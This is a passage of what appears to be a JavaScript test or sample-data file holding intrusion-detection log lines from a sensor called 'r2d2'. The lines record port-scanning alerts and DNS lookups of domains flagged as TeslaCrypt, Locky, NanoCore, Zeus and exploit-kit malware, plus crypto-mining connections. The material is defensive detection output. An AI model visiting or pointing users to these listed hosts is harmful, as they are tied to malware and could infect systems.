21,6099,6575,6816,7219,7542,7616,7848,8417,8818,9222,9802,9961,10406,10442,10619,10811,10893,11130,11281,11356,11585,11969,12694,12911,13274,13508,13637,13679,14012,14637,14777,14911,15278,16174,16248,17248,17731,17795,18461,18525,18717,19034,19159,19408,19556,19624,19735,19903,20225,20576,20758,21038,21170,21649,21819,21919,22329,22482,22584,22793,22983,23315,23407,23496,23690,23993,24060,24089,24319,24519,25076,27562,27733,27882,28980,29392,29973,30235,30449,30527,30531,30888,30998,31483,32586,32686,33033,33265,34004,34552,34904,35018,35684,35807,36322,36568,36740,36943,36996,37031,37180,37345,37538,37586,38216,38279,38456,38630,39317,39394,39477,39595,39980,40399,40621,40915,40966,41004,41105,41266,42410,43272,43279,43920,44075,44104,44453,44473,44486,44914,45723,45993,46097,46426,46460,46671,46786,46944,47971,48080,48805,49035,49240,50241,50707,50787,50877,50890,50951,50957,51306,51598,51728,51736,53284,53963,54230,54605,55524,55712,55741,56348,56620,56775,57420,57554,57624,57881,58147,58565,59239,59326,59579,59861,59892,60244,60254,60498,60761,60859,61041,61082,61105,61154,61627,61841,62416,63011,63381,63456,63811,64065,64253,64426,64464,64805,65253 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:08:38.000118" r2d2 2.200.108.59 33208,33390,33604,33642,33676,33678,33926,34006,34112,34144,34172,34244,34476,34488,35162,35174,35216,35462,35652,35672,35690,35702,35712,35738,35780,35812,36020,36068,36218,36224,36294,36428,36512,36520,36526,36530,36570,36632,36700,36788,37160,37184,37238,37604,37756,37818,37884,37908,38174,38244,38650,38746,38800,38834,38896,39222,39514,39654,40112,40278,40826,40834,40902,40984,41364,41400,41604,42126,42204,42402,42666,42834,43014,43080,43096,43806,43930,43940,43994,44050,44102,44178,44264,44504,44690,44718,44924,44930,45136,45714,45840,45936,45990,46046,46296,46442,46550,46720,46850,46862,46944,47068,47102,47128,47154,47658,47776,47864,47888,47930,48184,48192,48288,48306,48478,48488,48636,48694,48894,48938,49462,49844,50286,50370,50452,50574,50630,51034,51074,51114,51232,51278,51396,51422,51804,52008,52358,52472,52548,52736,52808,52924,53232,53522,53664,53854,54362,54502,54562,54606,54880,55164,55270,55336,55848,56004,56160,56224,56388,56492,56636,56794,56852,56948,57028,57038,57064,57414,57582,57692,57872,57928,57978,58072,58218,58360,58508,58554,58754,59082,59190,59204,59610,60428,60464,60496,60656,60766,60816,60822,60972 77.53.81.105 5118,5952,6029,6099,6362,6575,6989,7294,7616,8257,9151,9802,9961,10005,10118,10174,10472,10544,10799,11553,12191,12450,12704,12911,12971,12977,13274,13392,13637,14038,14410,14548,14777,14952,15014,15186,15729,16137,16296,16972,17255,17383,17992,18161,18242,18301,18569,18627,18679,19103,19141,20576,20653,20966,21038,21649,21952,22005,22008,22479,22793,22978,23012,23730,24368,24464,24962,25098,25663,26722,26804,27107,27882,28002,28144,28508,28980,29142,29497,29569,29665,29728,29973,30235,30321,30398,30465,30998,32148,32586,32676,32862,33731,33882,34004,34044,34552,34763,35018,35328,35548,35788,35807,36358,36691,36881,36967,37031,37333,37343,37426,37520,37586,38127,38179,38482,39329,39477,39595,39659,40765,40822,41004,42254,42562,43382,43542,43722,44051,44075,44914,45409,45839,45896,46173,46229,46537,46919,46944,47817,49365,49969,50182,50223,50554,50877,50909,51724,51736,51948,53091,53513,53707,53926,53936,53963,54048,54224,55361,55404,55586,56620,57252,57343,57554,58273,58565,59239,59326,59447,59579,59788,59861,60244,61041,61782,61841,61843,62407,62920,62960,63456,63764,63811,64387,64418,64458,64608,64805,65148,65523 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:08:45.000030" r2d2 2.200.108.59 33114,33446,33534,33678,33700,33834,33836,34578,35430,35572,35578,35820,36020,36166,36294,36382,36428,36520,36570,36726,36912,37422,37466,38172,38204,38712,39106,39620,39682,40006,40194,40290,40384,40698,40776,40968,41158,42130,42536,42818,43268,43574,43994,44016,44924,45016,45108,45230,45504,45972,46088,46124,46166,46196,46386,46550,46768,46824,46826,46862,47154,47192,47340,47386,47552,47746,47910,48138,48184,48464,48606,48700,48752,49226,49382,49434,49570,49604,49874,49916,49962,50264,50372,50626,50738,51020,51074,51224,51232,51396,51408,51804,51832,51860,51904,52224,52520,52548,52802,53374,53694,54450,54502,54702,55226,55386,55502,55630,55796,56004,56356,56818,57342,57382,57874,58218,58282,58322,58886,58906,59042,59170,59190,59556,59924,60060,60082,60186,60192,60206,60380 77.53.81.105 5323,5556,6779,7455,8582,8844,10860,11039,11894,12450,12679,13806,14132,14261,14410,15554,15567,17118,17672,18144,20813,20966,21192,22080,22298,22469,22749,22911,23057,23429,24138,24258,24371,24912,25053,25688,26277,26804,27509,27810,28144,29202,29352,30158,30309,30321,30508,30798,32071,32148,32494,32586,32712,32822,33204,33360,34703,34713,34763,35362,35800,35985,36583,36905,37426,37456,37520,37778,39043,39329,40144,41611,42045,42199,42204,42234,42250,42321,42919,43134,43371,43382,43947,44238,44571,45014,45095,45905,45929,46261,46558,46751,47343,48582,49471,49612,50182,50322,51531,51757,52177,52436,53091,53926,53976,54291,54429,54527,54623,56049,56654,56898,57036,57647,57961,58201,59267,59853,60884,60979,61085,61843,61851,61915,62164,62320,62576,62788,62963,65198,65385 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:08:53.762605" r2d2 2.200.107.169 53 2.200.110.232 49442 UDP DNS (leicon).it "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:08:53.762593" r2d2 2.200.107.169 53 2.200.110.232 49442 UDP DNS (leicon).it "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:08:45.000020" r2d2 2.200.108.59 32932,33014,33034,33098,33208,33392,33428,33446,33628,33730,33902,33946,34386,34466,34612,34888,35330,35390,35578,35750,35812,35820,35882,36020,36382,36430,36504,36530,36580,36582,36726,36770,36788,36912,36922,37238,37462,37540,37610,37756,37886,37892,38080,38172,38350,38388,38650,38712,38876,39002,39072,39164,39404,39876,40006,40020,40038,40070,40194,40220,40384,40458,40466,40698,41140,41334,41714,41860,42130,42444,42548,42564,42780,42852,43268,43314,43340,43366,43496,43544,43648,43750,43948,44050,44102,44178,44250,44378,44784,45108,45324,45972,46124,46166,46220,46306,46550,46606,46754,46812,47206,47224,47308,47332,47436,47852,48124,48132,48468,48578,48606,48638,48914,49220,49226,49434,49506,49552,49570,49844,49962,50204,50244,50266,50284,50846,50900,50930,50978,51006,51014,51020,51094,51118,51278,51614,51762,51804,51860,51986,52008,52376,52520,52606,53374,53694,53872,53946,53964,54194,54408,54450,54562,54614,54880,54958,55206,55556,56034,56806,56874,56948,57034,57038,57342,57814,58322,58532,58886,58984,59042,59170,59204,59282,59348,59454,59460,60060,60080,60082,60192,60278,60368,60520,60652,60782 77.53.81.105 5477,5764,5790,5829,7216,7455,7870,8245,8310,8582,8720,9151,9304,9944,10387,11039,11130,11318,11686,11894,11935,12392,12785,12801,13005,13167,13185,13709,14038,14261,14321,14514,14769,15302,15737,16126,16830,17003,17073,17395,17672,17783,18178,18386,20048,20373,20456,20657,20813,21612,22479,22763,23057,23133,23361,23672,23715,24111,24371,24464,24532,24818,24912,26462,27863,28451,28508,28688,29090,29202,29310,29416,29591,30309,30798,31469,31830,32640,32712,33183,33360,33655,33882,34580,34703,34713,35362,35481,35548,35800,35977,36182,36358,37045,37264,37456,37628,37643,38253,38293,38675,38803,39214,39432,39946,40144,40249,40489,40636,40815,40928,40933,42123,42199,42250,42254,42321,44238,44571,44595,45341,46144,46229,46641,46675,46751,47340,47343,47366,47399,47777,48509,49185,49212,49528,49602,50177,50373,50748,50909,51606,51653,51752,51920,52436,52835,52910,53707,53901,54598,54623,54819,55413,55586,56898,56959,57335,57343,57425,57790,57961,58321,58782,59172,59955,60899,60979,61085,61851,61915,61958,62164,62289,62407,62960,63171,63889,64107,64387,64499,64966,65088,65148,65385,65424 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:08:48.000040" r2d2 2.200.108.59 32880,32932,33008,33014,33034,33114,33170,33428,33582,33612,33730,33884,33902,33930,33932,33946,34092,34164,34578,34658,35218,35542,35572,35580,35614,35826,36058,36096,36174,36298,36342,36430,36580,36648,36770,37244,37328,37462,37466,37478,37696,37866,37920,38204,38350,38518,38564,38876,39002,39072,39390,39500,39682,39732,39774,39784,40038,40090,40220,40290,40320,40458,40834,40968,41082,41220,41684,42240,42404,42518,42536,42614,43250,43314,43496,43544,43750,43910,43948,44016,44238,44250,44378,44430,44534,44544,44722,44784,44858,45176,45310,45582,45868,45996,46088,46306,46404,46426,46550,46628,46636,46766,46824,46826,46938,47192,47206,47308,47334,47436,47552,47746,47852,47920,47984,48132,48294,48672,48690,48692,48914,48938,49040,49128,49382,49412,49488,49506,49546,49570,49874,50114,50198,50256,50372,50406,50424,50738,50768,50846,50860,50978,51014,51096,51242,51762,51864,51892,51986,52404,52546,52714,52902,53044,53578,53660,53722,53764,53766,53794,53872,53884,53998,54648,54702,54804,54932,54990,55054,55206,55386,55464,55798,55818,56136,56220,56356,56512,56738,56806,56818,57294,57338,57610,57792,57842,57874,57928,57936,57986,58100,58400,58532,58738,58960,59348,59738,59782,59960,60186,60206,60262,60520,60586,60912,60986,60998 77.53.81.105 5490,5556,5630,5661,5764,6570,6779,6822,7192,7262,8245,8310,8844,8852,9304,9817,10322,10439,10480,10553,10622,10747,10860,11531,11686,12650,12785,12941,13005,13167,13655,13806,13849,14132,14321,14646,14769,14807,15567,15932,16274,17662,17783,18144,18333,19054,19305,19559,20115,20128,20231,20373,20376,20456,20657,21374,21608,22080,22298,23133,23395,23708,23715,24111,24258,24412,24532,24684,25114,25452,25561,25688,27061,27787,27810,27863,28451,28538,28757,28833,29090,29591,30506,30508,30975,30999,31062,31469,31917,31973,32099,32640,32822,32910,32938,33028,33072,33177,33183,33204,33386,33655,34422,34548,34580,35897,35985,36182,36186,36392,36905,38289,38293,38306,38400,38657,39130,39398,40489,40573,40636,40647,40800,40928,41120,41289,41536,41687,42123,42919,43238,43265,43557,44431,44447,44595,45143,45288,45298,45483,45545,45746,45902,45929,46140,46434,46641,47079,47373,47771,47777,47950,48769,49185,49528,49607,49612,50117,50274,50466,50959,51757,51920,52661,52776,53165,53976,54087,54213,54336,54423,54598,54919,55413,55516,56580,56654,56941,57087,57616,57647,58723,58835,58902,59267,60013,60290,60621,60725,60729,60971,61958,62028,62289,62320,62574,63155,63182,63370,63564,63684,63889,64059,64379,64499,64534,64595,64933,64993 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:08:59.462757" r2d2 10.43.192.103 55915 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:08:59.608755" r2d2 2.200.110.232 64031 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:09:01.036631" r2d2 2.200.110.232 64508 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:09:01.038264" r2d2 2.200.107.146 28959 52.57.28.60 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:09:01.067562" r2d2 2.200.110.233 63276 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:08:53.000399" r2d2 2.200.108.59 32930,33392,33426,33486,33612,33930,34428,34448,34612,34658,34958,35330,35390,35522,35580,36016,36096,36220,36384,36408,36648,37106,37204,37378,37610,37756,37886,37920,37972,38040,38360,38480,38508,38804,38890,38986,39072,39098,39160,39198,39258,39404,39512,40068,40070,40086,40090,40320,40546,40566,40742,40938,41074,41334,41358,41490,41716,42044,42062,42308,42320,42428,42434,42908,43782,44238,44430,44440,44534,44898,45064,45324,45582,45738,45868,46328,46398,46428,46444,46758,46938,47342,47860,47956,47998,48156,48294,48672,48692,48988,49022,49024,49040,49128,49380,50080,50100,50198,50280,50376,50424,50554,50598,50788,50872,50886,51134,51242,51364,51388,51518,51564,52020,52026,52204,52294,52430,52734,52902,53044,53058,53366,53454,53716,53794,53884,53964,53998,54284,54640,55136,55442,55556,55818,55976,56198,56348,56494,56592,56602,56676,56764,57118,57456,57730,58104,59146,59180,59630,59738,59788,59832,59960,59966,60294,60478,60640,60736,60782,60898,60912,60986 77.53.81.105 5075,5791,6045,6078,6445,7262,8575,8852,8871,9868,10322,10412,10439,10480,10838,10951,11130,11233,11609,11683,11762,11966,12019,12057,12456,12650,13149,13602,14208,14599,14646,14659,15147,15161,15984,17512,18135,18232,18344,18521,18564,20099,20397,20813,20840,22763,23322,23347,23738,24089,24603,24657,24684,25918,26679,26881,26883,27521,27567,28049,28077,28336,28567,28758,28798,29052,29460,29924,30870,30999,31482,31744,32076,32733,33177,34548,35702,35703,35977,36186,36260,36392,36798,37045,37264,37643,38428,38657,38764,38803,38954,38987,39147,39250,39398,39516,39659,39712,40245,40760,40800,41147,41245,41536,42951,43243,43265,43370,43969,44027,44447,46362,46880,47214,47340,48214,48340,48384,48769,49212,50117,50560,50853,51297,51606,51653,52776,52835,53591,54213,54250,54541,55650,56066,56319,57425,57527,58723,58835,59724,60145,60621,60729,60971,61141,61190,61862,61973,62125,62574,62909,63155,63248,63289,63684,64059,64061,64098,64119,64484,65424,65520 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:08:55.000076" r2d2 2.200.108.59 32880,32930,33096,33284,33314,33562,34252,34424,34654,35274,35522,35778,36024,36174,36574,36754,36758,36844,36952,37036,37378,37406,37484,37696,37878,37972,38206,38348,38508,38544,38564,38804,38944,39198,39258,39344,39390,39442,39930,40254,40742,41074,41082,41216,41218,41220,41266,41580,42062,42308,43250,43920,44722,44782,45064,45074,45176,45738,46328,46926,47324,47984,48156,48246,48294,48690,49062,49118,49382,49414,50100,50148,50446,50554,50628,50770,50872,50886,50930,51134,51518,51528,51564,51580,51774,51892,52478,52546,52734,52776,53058,53542,53660,53824,54284,54640,54932,54990,55810,56106,56198,56738,56936,56972,57004,57338,57344,57456,57732,57876,58400,58848,59520,59782,59966,60074,60144,60252,60262,60498,60640,60736,60788,60842 77.53.81.105 5075,5223,5702,6445,6768,7241,7267,8108,8242,8397,8575,8822,10882,11531,11706,11762,12456,12805,12941,13357,13389,13602,13655,14208,14659,15725,16459,16842,17512,17662,18232,18521,19054,19305,19865,20099,20128,20157,20231,20430,20840,21551,21608,22386,22454,22606,23322,23708,23738,23977,24011,27085,27695,27794,28336,28538,28757,29563,29924,30453,30975,31482,31744,32061,32076,32099,32831,32910,33533,34589,35205,35329,35702,36182,36260,36810,37369,37595,38306,39147,39712,40760,40920,40984,41116,41291,43557,44247,44770,45640,46045,46300,46372,46434,46880,47406,47681,47942,48340,48384,49569,49607,50216,52667,52710,53060,53165,53591,54087,54336,54423,54769,54927,55895,58010,58836,59903,60494,61973,63583,64061,64119,64933,65188 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:09:06.586437" r2d2 2.200.110.232 63939 2.200.107.169 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:09:06.969161" r2d2 2.200.110.232 63427 2.200.107.169 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 01:09:06.970778" r2d2 2.200.107.146 58349 205.251.199.82 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 01:08:58.000545" r2d2 2.200.108.59 33284,34424,35274,36220,37106,37204,37406,37780,39072,39184,39198,39344,39442,39930,41084,41230,42044,42764,43228,45074,46428,46634,46926,47716,47956,48052,49022,50148,50376,50770,50788,51984,52478,52776,53454,53542,53824,54770,56806,57352,57732,57822,58848,59542,60144,60798 77.53.81.105 5702,7241,7267,8242,9092,10412,10951,13897,15984,18344,19284,19860,22386,22454,27085,28567,29563,32831,35205,35234,36212,36810,36921,37571,38428,39866,40245,41147,41245,41291,43243,44107,44298,44626,47406,47681,49752,52710,53060,53604,53961,54541,54927,56196,60494,61015 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:09:11.539003" r2d2 10.43.192.103 55917 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:09:17.574467" r2d2 10.43.192.103 55918 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:09:26.716326" r2d2 2.200.110.232 49227 2.200.107.169 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:09:26.717664" r2d2 2.200.107.146 14644 185.104.28.19 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:09:29.633758" r2d2 10.43.192.103 55920 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:09:35.675471" r2d2 10.43.192.103 55923 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:09:43.397401" r2d2 2.200.110.232 65132 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:09:46.828065" r2d2 2.200.110.232 63604 2.200.107.169 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:09:46.827245" r2d2 2.200.110.232 49475 2.200.107.169 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:09:46.828775" r2d2 2.200.107.146 9190 192.41.162.30 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:09:47.749482" r2d2 10.43.192.103 55933 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:09:47.774568" r2d2 2.200.110.233 64719 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:09:51.717953" r2d2 2.200.110.232 64092 2.200.107.169 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:09:51.726957" r2d2 2.200.110.232 65186 2.200.107.169 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:09:51.727240" r2d2 2.200.110.232 64100 2.200.107.169 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 01:09:51.728397" r2d2 2.200.107.146 49779 192.43.172.30 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:09:51.769035" r2d2 2.200.110.233 49239 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 01:09:51.769449" r2d2 2.200.110.233 64699 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:09:51.869480" r2d2 2.200.110.233 49211 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:09:51.969106" r2d2 2.200.110.232 64202 2.200.107.169 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 01:09:52.027717" r2d2 2.200.110.232 49242 2.200.107.169 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:09:52.056923" r2d2 2.200.110.232 64646 2.200.107.169 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:09:52.057483" r2d2 2.200.110.232 63491 2.200.107.169 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:09:52.237214" r2d2 2.200.110.232 63520 2.200.107.169 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 01:09:52.397974" r2d2 2.200.110.232 49280 2.200.107.169 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:09:53.781587" r2d2 10.43.192.103 55934 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:10:11.862255" r2d2 10.43.192.103 55937 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:10:17.895814" r2d2 10.43.192.103 55938 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:10:21.078819" r2d2 10.3.160.42 15528 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:10:21.178305" r2d2 10.3.160.42 15528 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:10:21.281259" r2d2 10.3.160.42 15528 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:10:22.178430" r2d2 10.3.160.42 15528 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:10:23.278548" r2d2 10.3.160.42 15528 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:10:23.921410" r2d2 202.164.138.192 44298 2.200.104.34 80 TCP UA "Hello, world" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:10:24.400236" r2d2 202.164.138.192 44298 2.200.104.34 80 TCP UA "Hello, world" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:10:29.967766" r2d2 10.43.192.103 55940 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:10:27.280353" r2d2 202.164.138.192 44298 2.200.104.34 80 TCP UA "Hello, world" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:10:31.130802" r2d2 202.164.138.192 44298 2.200.104.34 80 TCP UA "Hello, world" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:10:32.792817" r2d2 10.1.19.42 59084 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:10:43.381510" r2d2 2.200.110.232 64274 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:10:54.229763" r2d2 202.164.138.192 44298 2.200.104.34 80 TCP UA "Hello, world" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:10:57.781086" r2d2 2.200.107.146 56054 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:10:57.779544" r2d2 2.200.110.232 64058 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:10:57.804876" r2d2 2.200.110.233 63587 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:11:25.028275" r2d2 202.164.138.192 44298 2.200.104.34 80 TCP UA "Hello, world" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:11:42.842367" r2d2 2.200.110.232 64939 2.200.107.169 53 UDP DNS (td-username-db4-63-97).wix.com "free web hosting (suspicious)" (static)\n' +
    '"2021-01-11 01:11:42.843581" r2d2 2.200.107.146 51582 198.51.45.67 53 UDP DNS (td-username-db4-63-97).wix.com "free web hosting (suspicious)" (static)\n' +
    '"2021-01-11 01:11:53.644720" r2d2 2.200.110.232 64154 2.200.107.169 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:11:53.646716" r2d2 2.200.107.146 48721 172.64.33.92 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:11:54.053585" r2d2 2.200.107.146 41868 173.245.58.63 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:11:54.051756" r2d2 2.200.110.232 64043 2.200.107.169 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:11:59.609290" r2d2 2.200.110.232 65218 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:11:59.614245" r2d2 2.200.110.232 64257 2.200.107.169 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 01:11:59.616230" r2d2 2.200.107.146 57622 37.209.198.12 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 01:11:59.621994" r2d2 2.200.110.232 64131 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:11:59.623690" r2d2 2.200.107.146 42901 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:12:06.752973" r2d2 2.200.110.233 63479 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:12:06.843047" r2d2 2.200.110.233 64441 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 01:12:06.863502" r2d2 2.200.110.233 65380 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:12:06.882890" r2d2 2.200.107.146 48281 52.50.73.4 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:12:06.881222" r2d2 2.200.110.232 64322 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:12:06.931518" r2d2 2.200.110.233 65171 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:12:07.813813" r2d2 2.200.110.233 63727 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:12:14.540404" r2d2 10.1.19.42 59095 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:12:42.459885" r2d2 2.200.97.1 52700 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:12:45.338593" r2d2 2.200.105.226 58777 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:12:45.338213" r2d2 2.200.105.226 58777 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:12:45.338204" r2d2 2.200.105.226 58777 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:13:05.123510" r2d2 178.17.174.14 46872 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FCTB100750; BTRS124828; .NET CLR 1.1.4322; FunWebProducts; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET4.0C\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:13:05.123515" r2d2 178.17.174.14 46872 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FCTB100750; BTRS124828; .NET CLR 1.1.4322; FunWebProducts; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET4.0C\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:13:17.823370" r2d2 2.200.110.232 64247 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:13:17.859838" r2d2 2.200.110.233 64280 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:13:24.843887" r2d2 2.200.110.233 49338 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 01:13:31.000319" r2d2 2.200.108.59 22240,22244,22247,22249,22250,22251,22252,22255,22257,22258,22263,22264,22265,22266,22267,22268,22269,32832,33122,34276,34794,36890,37276,37298,37426,38903,38904,39950,40264,42478,43874,44088,45156,45192,45758,46236,49130,52858,54550,55784,55884,57230,57312,58584,60534 77.53.81.105 21,6393,6537,10024,11803,14340,15569,16867,17213,17367,18876,22884,23429,24261,26063,26922,28582,30032,31560,32205,33824,35603,39113,41604,45150,64231 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
